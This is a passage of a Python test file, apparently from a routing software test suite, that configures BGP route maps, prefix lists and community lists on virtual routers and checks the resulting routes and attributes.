"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
}
]
}
}
}
input_dict_3_addr_type[addr_type] = input_dict_3
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 200},
}
]
}
}
}
input_dict_3_addr_type[addr_type] = input_dict_3
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_6 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {"ipv4": ["10.0.30.1/32"], "ipv6": ["1::1/128"]}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3_addr_type[addr_type],
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
routes = {"ipv4": ["20.0.30.1/32"], "ipv6": ["2::1/128"]}
for addr_type in ADDR_TYPES:
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_multiple_match_statement_in_route_map_logical_ANDed_p1():
"""
TC_44:
Test multiple match statements as part of a route-map's single
sequence number. (Logical AND of multiple match statements)
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_5 = {
"r1": {
"route_maps": {
"rm_r1_out_{}".format(addr_type): [
{
"action": "permit",
"set": {
"large_community": {"num": "1:1:1 1:2:3 2:1:1 2:2:2"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
for addr_type in ADDR_TYPES:
input_dict_6 = {
"r1": {
"bgp": {
"address_family": {
addr_type: {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rm_r1_out_{}".format(
addr_type
),
"direction": "out",
}
]
}
}
}
}
}
}
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
for addr_type in ADDR_TYPES:
# Create standard large community-list
input_dict_1 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "rmap_lcomm_{}".format(addr_type),
"value": "1:1:1 1:2:3 2:1:1 2:2:2",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verify BGP large community is created
result = verify_create_community_list(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
for addr_type in ADDR_TYPES:
# Create route map
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"large_community_list": {
"id": "rmap_lcomm_" + addr_type
}
}
},
"set": {
"locPrf": 150,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
for addr_type in ADDR_TYPES:
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
addr_type: {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_{}".format(
addr_type
),
"direction": "in",
}
]
}
}
}
}
}
}
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# sleep(10)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_add_remove_rmap_to_specific_neighbor_p0():
"""
TC_41:
Test add/remove route-maps to specific neighbor and see if
it takes effect as intended
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "deny"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "deny"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \n Error Routes are still present: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Remove applied rmap from neighbor
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
"delete": True,
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
"delete": True,
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_clear_bgp_and_flap_interface_to_verify_rmap_properties_p0():
"""
TC_56:
Test clear BGP sessions and interface flaps to see if
route-map properties are intact.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150, "weight": 100},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Clear BGP, so config changes are reflected
dut = "r3"
result = clear_bgp_and_verify(tgen, topo, dut)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Flap interface to see if route-map properties are intact
# Shutdown interface
dut = "r3"
intf = "r3-r1-eth0"
shutdown_bringup_interface(tgen, dut, intf, False)
sleep(5)
# Bringup interface
dut = "r3"
intf = "r3-r1-eth0"
shutdown_bringup_interface(tgen, dut, intf, True)
# Verify BGP convergence once interface is up
result = verify_bgp_convergence(tgen, topo)
assert result is True, "setup_module :Failed \n Error:" " {}".format(result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_rmap_without_match_and_set_clause_p0():
"""
TC_46:
Verify if a blank sequence number can be created (without any
match/set clause) and check if it allows all the traffic/prefixes
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_no_match_set_1_{}".format(addr_type): [
{"action": "permit", "seq_id": "5"}
],
"rmap_no_match_set_2_{}".format(addr_type): [
{"action": "deny", "seq_id": "5"}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nRoutes are still present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_set_localpref_weight_to_ebgp_and_med_to_ibgp_peers_p0():
"""
TC_48:
Create route map setting local preference and weight to eBGP peer
and metric to iBGP peer and verify it does not get advertised
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
input_dict_3_addr_type = {}
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
}
],
"rmap_match_pf_3_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"weight": 1000},
}
],
}
}
}
input_dict_3_addr_type[addr_type] = input_dict_3
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
"r5": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_3_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
"r5": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_3_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_1"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_2"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3_addr_type[addr_type],
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed \nAttributes are still set \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r5"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r5"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_3"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_3_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3_addr_type[addr_type],
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed \nAttributes are still set \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_multiple_set_on_single_sequence_in_rmap_p0():
"""
TC_43:
Test multiple set statements as part of a route-map's
single sequence number.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150, "weight": 100, "metric": 50},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_1"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_route_maps_with_continue_clause_p0():
"""
TC_54:
Verify route-maps continue clause functionality.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "10",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
"continue": "30",
},
{
"action": "permit",
"seq_id": "20",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 200},
},
{
"action": "permit",
"seq_id": "30",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 100},
},
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
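# The "continue": "30" knob is expected to behave like FRR's on-match
# goto, roughly (illustrative sketch):
#
#   route-map rmap_match_pf_1_ipv4 permit 10
#    match ip address prefix-list pf_list_1_ipv4
#    set local-preference 150
#    on-match goto 30
#
# so sequence 20 (set metric 200) is skipped while sequence 30
# (set metric 100) still runs, which is why seq_id ["10", "30"] is
# verified below.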
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
rmap_name = "rmap_match_pf_1"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
seq_id = {"ipv4": ["10", "30"], "ipv6": ["10", "30"]}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3,
seq_id[addr_type],
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_route_maps_with_goto_clause_p0():
"""
TC_55:
Verify route-maps goto clause functionality.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "10",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"goto": "30",
},
{
"action": "permit",
"seq_id": "20",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 100},
},
{
"action": "permit",
"seq_id": "30",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 200},
},
]
}
}
}
result = create_route_maps(tgen, input_dict_3)

assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
